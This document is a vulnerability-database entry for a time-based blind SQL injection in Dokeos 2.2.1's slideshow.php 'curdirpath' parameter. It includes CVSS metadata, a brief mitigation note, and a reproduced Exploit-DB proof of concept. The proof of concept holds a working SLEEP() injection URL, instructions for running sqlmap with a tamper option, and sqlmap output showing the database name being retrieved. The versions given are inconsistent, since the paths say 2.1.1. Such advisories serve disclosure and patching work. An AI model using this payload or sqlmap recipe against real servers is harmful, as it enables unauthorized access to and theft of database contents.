Dokeos Blind SQL Injection

vendor:

Dokeos

by:

Mormoroth

7,5

CVSS

HIGH

Time-Based Blind SQL Injection

CWE

Product Name: Dokeos

Affected Version From: 2.2.1

Affected Version To: 2.2.1

Patch Exists: YES

Related CWE: N/A

CPE: a:dokeos:dokeos:2.2.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu

2016

The 'curdirpath' parameter in the 'slideshow.php' file of Dokeos 2.2.1 is vulnerable to time-based blind SQL injection. An attacker can exploit this vulnerability by sending a malicious payload to the 'curdirpath' parameter. The payload should be crafted in such a way that it will cause the server to pause for a certain amount of time. This can be done by using the 'SLEEP()' function. The attacker can then use a tool like Sqlmap to exploit the vulnerability and retrieve data from the database.

Mitigation:

Input validation should be used to prevent malicious payloads from being sent to the server. Additionally, the application should be kept up to date with the latest security patches.

Source

Exploit-DB raw data:

# Exploit Title: Dokeos Blind SQL Injection
# Date: 2016-06-14
# Exploit Author: Mormoroth
# Exploit Author Blog: http://ha.cker.ir
# Vendor Homepage: http://www.dokeos.com/
# Software Link: http://jaist.dl.sourceforge.net/project/dokeos/dokeos-2.1.1.zip
# Version: 2.2.1
# Tested on: Ubuntu
# Twitter : https://twitter.com/Mormoroth
------
Note : hackme.com is localdomain on lab , not a live website
------
VULNERABILITY
curdirpath in slidshow.php is vulnerable to time-based blind sqlinjection
------
POC :

Payload: http://hackme.com:80/dokeos-2.1.1/main/document/slideshow.php?cidReq=123&curdirpath=' AND (SELECT * FROM (SELECT(SLEEP(5)))Pfag) AND 'NFwV'='NFwV&slide_id=all
------
Exploiting vulnerability with Sqlmap
Note : to exploit with sqlmap you should use --tamper=between option to retrieve data
------
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://hackme.com:80/dokeos-2.1.1/main/document/slideshow.php?cidReq=123&curdirpath=' AND (SELECT * FROM (SELECT(SLEEP(5)))Pfag) AND 'NFwV'='NFwV&slide_id=all
------
[22:25:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7
back-end DBMS: MySQL 5.0.12
[22:25:09] [INFO] fetching current database
[22:25:09] [INFO] resumed: dokeos_main
current database:    'dokeos_main'
[22:25:09] [INFO] fetched data logged to text files under 'C:\Users\Mort\.sqlmap\output\hackme.com'

C:\Users\Mort\Desktop\Apps\sqlmap>
------